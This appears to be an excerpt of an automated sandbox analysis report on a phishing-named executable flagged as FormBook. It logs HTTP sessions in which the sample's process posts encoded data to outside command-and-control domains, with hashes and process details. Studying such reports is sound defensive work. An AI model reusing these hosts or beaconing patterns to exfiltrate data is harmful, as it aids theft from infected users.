                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>


                                                    Session ID: 10 | Source IP: 192.168.2.7 | Source Port: 49948 | Destination IP: 66.29.149.46 | Destination Port: 80 | PID: 6896 | Process: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    Timestamp: Dec 13, 2024 13:08:14.151283979 CET | Bytes transferred: 897 | Direction: OUT | Data: POST /cnve/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.infohive.website
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 239
                                                    Cache-Control: no-cache
                                                    Origin: http://www.infohive.website
                                                    Referer: http://www.infohive.website/cnve/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Data Raw: 55 5a 6b 74 5f 70 3d 37 58 72 79 54 6f 73 31 30 52 71 57 6e 6a 74 5a 4e 44 6e 36 53 34 74 78 56 70 44 6b 52 38 37 49 6a 72 2b 32 49 55 35 6b 73 51 54 37 6e 37 49 52 51 54 39 53 55 66 65 4e 55 42 68 56 48 48 48 5a 61 63 4d 56 6f 6d 71 74 4a 76 42 61 36 70 74 57 63 50 35 50 58 33 77 76 64 56 61 55 2f 4e 50 57 64 61 6f 39 4a 52 56 4a 74 72 74 56 50 69 70 56 6b 6d 65 73 6c 39 46 6a 43 2b 58 2b 6d 72 33 6a 69 6b 61 4d 54 63 2f 6f 31 72 63 71 4e 6d 66 68 58 39 6d 70 44 51 56 59 54 4b 66 58 4f 55 43 64 50 4a 43 48 74 75 30 66 6f 6e 6e 54 6a 49 56 45 79 49 67 4e 41 38 70 54 4a 7a 36 61 59 62 4a 77 6d 78 38 2f 6d 35 34 4a 34 47 4e 78 68 50 69 59 36 38 76 42 73 4d 57 54 43 45 45 5a 73 4f 52 72 55 6f 50 70 45 54 38 3d
                                                    Data Ascii: UZkt_p=7XryTos10RqWnjtZNDn6S4txVpDkR87Ijr+2IU5ksQT7n7IRQT9SUfeNUBhVHHHZacMVomqtJvBa6ptWcP5PX3wvdVaU/NPWdao9JRVJtrtVPipVkmesl9FjC+X+mr3jikaMTc/o1rcqNmfhX9mpDQVYTKfXOUCdPJCHtu0fonnTjIVEyIgNA8pTJz6aYbJwmx8/m54J4GNxhPiY68vBsMWTCEEZsORrUoPpET8=
                                                    Timestamp: Dec 13, 2024 13:08:15.375128031 CET | Bytes transferred: 637 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                    Date: Fri, 13 Dec 2024 12:08:15 GMT
                                                    Server: Apache
                                                    Content-Length: 493
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>


                                                    Session ID: 11 | Source IP: 192.168.2.7 | Source Port: 49955 | Destination IP: 66.29.149.46 | Destination Port: 80 | PID: 6896 | Process: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    Timestamp: Dec 13, 2024 13:08:16.825684071 CET | Bytes transferred: 1910 | Direction: OUT | Data: POST /cnve/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.infohive.website
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 1251
                                                    Cache-Control: no-cache
                                                    Origin: http://www.infohive.website
                                                    Referer: http://www.infohive.website/cnve/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Data Raw: 55 5a 6b 74 5f 70 3d 37 58 72 79 54 6f 73 31 30 52 71 57 6e 6a 74 5a 4e 44 6e 36 53 34 74 78 56 70 44 6b 52 38 37 49 6a 72 2b 32 49 55 35 6b 73 51 72 37 6e 49 41 52 52 77 6c 53 56 66 65 4e 4b 52 68 51 48 48 48 2b 61 66 38 52 6f 6e 58 61 4a 73 35 61 31 76 68 57 56 61 56 50 64 33 77 76 52 31 61 56 31 74 50 35 64 61 59 35 4a 52 46 4a 74 72 74 56 50 67 42 56 6a 33 65 73 6a 39 46 73 55 75 58 49 78 62 32 2b 69 6b 54 35 54 66 54 34 31 62 38 71 4f 46 33 68 57 4f 4f 70 50 51 56 57 51 4b 66 50 4f 55 47 47 50 4a 65 44 74 75 52 43 6f 6e 66 54 7a 4d 45 49 33 36 77 4b 63 74 52 30 4a 69 4b 68 58 59 68 38 6e 54 35 63 73 4a 59 76 77 47 70 76 34 75 4f 4a 78 35 32 37 77 66 32 42 4b 48 41 5a 73 62 73 41 48 4a 66 61 51 58 4d 45 4f 57 6f 50 69 55 62 77 6e 74 37 78 4e 63 36 38 75 45 76 4c 43 77 4a 75 6d 75 38 32 68 67 6f 38 7a 46 72 73 46 42 42 55 33 79 41 66 78 53 33 52 54 58 4e 71 66 47 6e 72 69 72 76 45 32 66 46 56 6b 4c 32 77 57 53 49 61 55 31 73 35 69 6a 43 75 2f 37 30 4f 32 53 4f 62 50 39 30 62 78 45 68 76 30 6f 2b [TRUNCATED]
                                                    Data Ascii: UZkt_p=7XryTos10RqWnjtZNDn6S4txVpDkR87Ijr+2IU5ksQr7nIARRwlSVfeNKRhQHHH+af8RonXaJs5a1vhWVaVPd3wvR1aV1tP5daY5JRFJtrtVPgBVj3esj9FsUuXIxb2+ikT5TfT41b8qOF3hWOOpPQVWQKfPOUGGPJeDtuRConfTzMEI36wKctR0JiKhXYh8nT5csJYvwGpv4uOJx527wf2BKHAZsbsAHJfaQXMEOWoPiUbwnt7xNc68uEvLCwJumu82hgo8zFrsFBBU3yAfxS3RTXNqfGnrirvE2fFVkL2wWSIaU1s5ijCu/70O2SObP90bxEhv0o+aCp0pyGmNdGpXLiPxk8nL75le1zERkXo0GYtYutfAdo3UQV1zc0BMULKAhk8rvw7itbMQUxTLHDQ+4nWaqI4U2RJbSlUvCpAIX8Jfoj+VDp60xqoUs8hqWrmtNNl2J6QWeLwrPSPJ7S73e/hGVcaEuqdwmNyl3dm0Q3pC+I9u7cacBDJwUn1Ub6RB/bvO36D0N0Lhnwvbx3JwgI7Yki9U1oQVUPd/w4n7tuDgJsXDM1Jnl3THeHUo2f0EfWobdDwF/smvtmGSKPzwCmkSrD+hquGELXlfM5rCvREXBACHXEsO7IkxfK9HjQL95GaEeMgn5ww/dbtumXfo0NQfBG/qny1y3fkcIuk/MiixDDf6IXKpayrgin6JawU50XGHmv5Drvuv7mMDBNFA1Dn4i2fxtN4LJUETlEyjb+QX6CQLn+Xl6Te0dy/JKX7dRyI2FTwHYQ2lvLx3ee1oN4GBLZqBZEEz6kwkMgNcx2lrbe036l1x52MXZnTxxuQ8BRIGcjaY7/z11GlVySK3o4q6+6ZZ20E4bUKZnmdVgmG76HA4XsJTiUVLGnctVJLXtAhAyVMqYHr+N0mO0zfK4yuNH/2/mg8OVYLpedXjAFN3rIJ9RA/+t8saJxlcTuWHxBEQUAebcdEeoS9rWVJTeEaeLlf2HfIavzXZYfNnz [TRUNCATED]
                                                    Timestamp: Dec 13, 2024 13:08:18.034415007 CET | Bytes transferred: 637 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                    Date: Fri, 13 Dec 2024 12:08:17 GMT
                                                    Server: Apache
                                                    Content-Length: 493
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>


                                                    Session ID: 12 | Source IP: 192.168.2.7 | Source Port: 49961 | Destination IP: 66.29.149.46 | Destination Port: 80 | PID: 6896 | Process: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    Timestamp: Dec 13, 2024 13:08:19.564925909 CET | Bytes transferred: 603 | Direction: OUT | Data: GET /cnve/?UZkt_p=2VDSQdlG5RaW3hcOSzrtXrxDd4bhZ8b1rLrGGnoiqQrQ5oU7TABHb8GSGDxsLG7YK+gXk2baIuNiiMBLfcdVYx8sa0WL+tT4casLEwE0iohoJSZhnQSJqMleUJfhtsmPpk3GYPvE1sgo&Er=qt9d5V HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.infohive.website
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Timestamp: Dec 13, 2024 13:08:20.715131044 CET | Bytes transferred: 652 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                    Date: Fri, 13 Dec 2024 12:08:20 GMT
                                                    Server: Apache
                                                    Content-Length: 493
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>


                                                    Session ID: 13 | Source IP: 192.168.2.7 | Source Port: 49978 | Destination IP: 217.70.184.50 | Destination Port: 80 | PID: 6896 | Process: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    Timestamp: Dec 13, 2024 13:08:26.568495035 CET | Bytes transferred: 865 | Direction: OUT | Data: POST /ead0/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.sunnyz.store
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 219
                                                    Cache-Control: no-cache
                                                    Origin: http://www.sunnyz.store
                                                    Referer: http://www.sunnyz.store/ead0/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Data Raw: 55 5a 6b 74 5f 70 3d 44 79 50 79 68 6d 53 79 6c 67 74 6d 48 6d 61 55 71 57 6f 30 34 54 78 55 45 43 33 78 4a 36 45 6b 77 79 34 74 6a 79 43 73 48 4d 71 76 4c 41 6b 57 34 47 56 6c 2f 50 76 65 36 2b 57 38 75 55 51 48 36 47 6c 66 7a 42 36 31 39 39 41 58 63 36 69 67 78 53 2f 76 6b 38 6d 75 74 5a 55 6c 55 54 4b 68 67 58 42 35 4e 42 53 78 33 59 35 2f 6f 51 47 34 70 73 2f 46 37 57 51 75 72 34 4a 47 72 70 49 47 37 67 66 57 55 78 4a 34 4d 65 78 49 65 43 52 32 64 4f 47 4d 2f 2f 51 67 43 6e 65 56 63 6c 30 6e 79 6e 48 62 30 41 54 30 63 4d 62 68 48 58 51 47 51 37 52 4c 56 67 37 5a 67 67 57 37 2b 77 51 6f 64 65 59 58 34 65 64 2b 70 6c 63 65 2b 59 6d 57 4e 41 3d 3d
                                                    Data Ascii: UZkt_p=DyPyhmSylgtmHmaUqWo04TxUEC3xJ6Ekwy4tjyCsHMqvLAkW4GVl/Pve6+W8uUQH6GlfzB6199AXc6igxS/vk8mutZUlUTKhgXB5NBSx3Y5/oQG4ps/F7WQur4JGrpIG7gfWUxJ4MexIeCR2dOGM//QgCneVcl0nynHb0AT0cMbhHXQGQ7RLVg7ZggW7+wQodeYX4ed+plce+YmWNA==
                                                    Dec 13, 2024 13:08:27.793652058 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                    Server: nginx
                                                    Date: Fri, 13 Dec 2024 12:08:27 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    14 | 192.168.2.7 | 49985 | 217.70.184.50 | 80 | 6896 | C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Dec 13, 2024 13:08:29.229239941 CET | 885 | OUT | POST /ead0/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.sunnyz.store
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 239
                                                    Cache-Control: no-cache
                                                    Origin: http://www.sunnyz.store
                                                    Referer: http://www.sunnyz.store/ead0/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Data Ascii: UZkt_p=DyPyhmSylgtmVWKUs1Q0vjxTBC3xCaEowy0tjzXzG+evOQUWqThlxvve1eWlqUQy6GogzEa199kXc6SgwlLo+Mmsl5UnazKhgXB5NFCX3Yh/ph2449/GkmQp9oJGgJId7gfgUwVWMdZIeA52d8uNkPQqcXfGS1V590Xb7CrIY7aHPBRkKZdnLxDikiyNpWNdffcP18pf2S50zKHSb9nngykXF0pAbQfLQn03YVM=
                                                    Dec 13, 2024 13:08:30.458702087 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                    Server: nginx
                                                    Date: Fri, 13 Dec 2024 12:08:30 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                    15 | 192.168.2.7 | 49989 | 217.70.184.50 | 80
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Dec 13, 2024 13:08:32.466933012 CET | 1898 | OUT | POST /ead0/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.sunnyz.store
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 1251
                                                    Cache-Control: no-cache
                                                    Origin: http://www.sunnyz.store
                                                    Referer: http://www.sunnyz.store/ead0/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Data Ascii: UZkt_p=[TRUNCATED]
                                                    Dec 13, 2024 13:08:33.827815056 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                    Server: nginx
                                                    Date: Fri, 13 Dec 2024 12:08:33 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                    16 | 192.168.2.7 | 49990 | 217.70.184.50 | 80
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Dec 13, 2024 13:08:35.131360054 CET | 599 | OUT | GET /ead0/?UZkt_p=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBis+/iOoNTjmW2l9qNTHM4rN5vAuihI7D9EwPr7Z7opV/5wbcLxFzIpB/&Er=qt9d5V HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.sunnyz.store
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Dec 13, 2024 13:08:36.422768116 CET | 1236 | IN | HTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Fri, 13 Dec 2024 12:08:36 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Content-Security-Policy: default-src 'self'; script-src 'nonce-b1c53dea5f314d13a7914e495cb2ee85';
                                                    Vary: Accept-Language
                                                    Data Ascii: 91c<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-b1c53dea5f314d13a7914e495cb2ee85';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>sunnyz.store</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class
                                                    Dec 13, 2024 13:08:36.422811985 CET | 1236 | IN | Data Ascii: ="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=s
                                                    Dec 13, 2024 13:08:36.422833920 CET | 160 | IN | Data Ascii: ner('click', (e) => { window.location.replace(atob(e.target.dataset.url) + 'sunnyz.store'); }); });</script></main></div> </body></html>0


                                                    Target ID:0
                                                    Start time:07:06:23
                                                    Start date:13/12/2024
                                                    Path:C:\Users\user\Desktop\Quotation Request-349849.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\Quotation Request-349849.exe"
                                                    Imagebase:0x7d0000
                                                    File size:1'201'664 bytes
                                                    MD5 hash:060D1FA22CA3227BEF173104F09A853C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:07:06:26
                                                    Start date:13/12/2024
                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\Quotation Request-349849.exe"
                                                    Imagebase:0x950000
                                                    File size:46'504 bytes
                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1736836751.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
